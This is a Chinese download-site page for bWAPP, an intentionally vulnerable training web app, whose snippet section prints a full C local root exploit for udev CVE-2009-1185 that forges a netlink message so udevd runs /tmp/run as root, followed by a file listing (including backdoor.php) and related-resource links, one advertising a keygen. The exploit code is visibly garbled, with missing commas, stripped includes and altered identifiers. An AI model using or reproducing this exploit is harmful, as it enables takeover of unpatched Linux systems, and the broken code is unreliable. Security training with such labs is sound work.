资源简介
bwapp官方最新版本
代码片段和文件信息
/*
* cve-2009-1185.c
*
* udev < 141 Local Privilege Escalation Exploit
* Jon Oberheide
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
*
* udev before 1.4.1 does not verify whether a NETlink message originates
* from kernel space which allows local users to gain privileges by sending
* a NETlink message from user space.
*
* Notes:
*
* An alternate version of kcope‘s exploit. This exploit leverages the
* 95-udev-late.rules functionality that is meant to run arbitrary commands
* when a device is removed. A bit cleaner and reliable as long as your
* distro ships that rule file.
*
* Tested on Gentoo Intrepid and Jaunty.
*
* Usage:
*
* Pass the PID of the udevd netlink socket (listed in /proc/net/netlink
* usually is the udevd PID minus 1) as argv[1].
*
* The exploit will execute /tmp/run as root so throw whatever payload you
* want in there.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include nk.h>
#ifndef NETlink_Kobject_UEVENT
#define NETlink_Kobject_UEVENT 15
#endif
int
main(int argc char **argv)
{
int sock;
char *mp *err;
char message[4096];
struct stat st;
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
if (argc < 2) {
err = “Pass the udevd netlink PID as an argument“;
printf(“[-] Error: %s\n“ err);
exit(1);
}
if ((stat(“/etc/udev/rules.d/95-udev-late.rules“ &st) == -1) &&
(stat(“/lib/udev/rules.d/95-udev-late.rules“ &st) == -1)) {
err = “Required 95-udev-late.rules not found“;
printf(“[-] Error: %s\n“ err);
exit(1);
}
if (stat(“/tmp/run“ &st) == -1) {
err = “/tmp/run does not exist please create it“;
printf(“[-] Error: %s\n“ err);
exit(1);
}
system(“chmod +x /tmp/run“);
memset(&address 0 sizeof(address));
address.nl_family = AF_NETlink;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETlink SOCK_DGRAM NETlink_Kobject_UEVENT);
bind(sock (struct sockaddr *) &address sizeof(address));
mp = message;
mp += sprintf(mp “remove@/d“) + 1;
mp += sprintf(mp “SUBSYSTEM=block“) + 1;
mp += sprintf(mp “DEVPATH=/dev/foo“) + 1;
mp += sprintf(mp “TIMEOUT=10“) + 1;
mp += sprintf(mp “ACTION=remove“) +1;
mp += sprintf(mp “REMOVE_CMD=/tmp/run“) +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock &msg 0);
close(sock);
return 0;
}
// milw0rm.com [2009-04-30]
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 2602 2014-09-27 18:16 apache2\default
文件 226 2013-12-17 00:04 apache2\httpd.conf
文件 112 2014-03-08 15:05 bWAPP\666
目录 0 2014-03-17 04:20 bWAPP\admin\
文件 4471 2014-09-27 17:58 bWAPP\admin\index.php
文件 645 2014-05-01 21:51 bWAPP\admin\phpinfo.php
文件 2229 2014-09-27 17:59 bWAPP\admin\settings.php
文件 2093 2014-05-11 00:27 bWAPP\aim.php
目录 0 2014-05-11 02:44 bWAPP\apps\
文件 55719 2014-05-11 02:41 bWAPP\apps\movie_search
文件 6623 2014-09-27 01:57 bWAPP\ba_captcha_bypass.php
文件 10033 2014-09-27 01:57 bWAPP\ba_forgotten.php
文件 1208 2014-05-01 21:51 bWAPP\ba_insecure_login.php
文件 7551 2014-09-27 01:57 bWAPP\ba_insecure_login_1.php
文件 9338 2014-09-27 01:57 bWAPP\ba_insecure_login_2.php
文件 7471 2014-09-27 01:57 bWAPP\ba_insecure_login_3.php
文件 4848 2014-09-27 01:57 bWAPP\ba_logout.php
文件 1737 2014-05-18 20:56 bWAPP\ba_logout_1.php
文件 1200 2014-05-01 21:51 bWAPP\ba_pwd_attacks.php
文件 7524 2014-09-27 01:57 bWAPP\ba_pwd_attacks_1.php
文件 7914 2014-09-27 01:57 bWAPP\ba_pwd_attacks_2.php
文件 8212 2014-09-27 01:57 bWAPP\ba_pwd_attacks_3.php
文件 8039 2014-09-27 01:57 bWAPP\ba_pwd_attacks_4.php
文件 5894 2014-09-27 01:57 bWAPP\ba_weak_pwd.php
文件 732 2014-03-29 20:04 bWAPP\backdoor.php
文件 5907 2014-09-27 01:57 bWAPP\bof_1.php
文件 4804 2014-09-27 01:57 bWAPP\bof_2.php
文件 7858 2014-11-02 22:57 bWAPP\bugs.txt
文件 1821 2014-05-01 21:51 bWAPP\captcha.php
文件 1101 2014-05-01 21:51 bWAPP\captcha_box.php
文件 5941 2014-09-27 01:57 bWAPP\clickjacking.php
............此处省略265个文件信息
- 上一篇:windows7 NVME补丁
- 下一篇:labview发送can数据的通信
相关资源
- FontCreator 9.0官方最新版
- nModbus DLL官方最新组件
- Git官方最新版 Git-2.17.0-64-bit 64位Wind
- Chrome Extension Chrome插件开发官方最新
- 华硕ATK Package(华硕笔记本的快捷键驱
- redis-desktop-manager-0.8.3.3850官方最新版
- 戴尔DELL灵越Inspiron N4120蓝牙驱动程序
- ros-x86-6.40.5官方最新版本,包括ISO安装
- 九章刷题小助手chrome插件v1.1.0官方最
- IntelliJ IDEA 代码编辑区迷你缩放图插件
- Visual Paradim软件官方安装包: Visual_Pa
- SSCOM32的升级版SSCOM5.12 官方最新版
- 中盈税之星qs312k打印机驱动 v1.1 官方
- 中盈税之星QS630KII打印机驱动 v1.0.0.
- 莱仕达龙之血刃PXN-8606游戏手柄驱动
- 莱仕达幻影PXN-S16游戏方向盘驱动 官方
- 莱仕达雷驰II PXN-V3II 游戏方向盘驱动
- Turbo C 3.0 官方最新版
- ibm m5015阵列卡驱动 v5.2.116 官方最新版
- 北斗小辣椒USB驱动 官方最新免费版
- vs2017_enterprise__企业版(有码)_官方最
- 骨伽600m鼠标驱动程序
- 联想平板yoga tablet 2驱动程序 官方最新
- vs2017_professional__专业版(有码)_官方
- .NET Reflector 8.5.0.179 官方最新版+注册机
- VisualSVN-Server-4.2.1-win32 官方最新版 2
- NPOI官方最新原版2.4.0
- tcl官方最新安装包tcl8.6.1-src.tar.gz
- 官方最新Bitvise SSH Client安装包
- RealVNC.Enterprise.v4.6.1Keymaker_201
评论
共有 条评论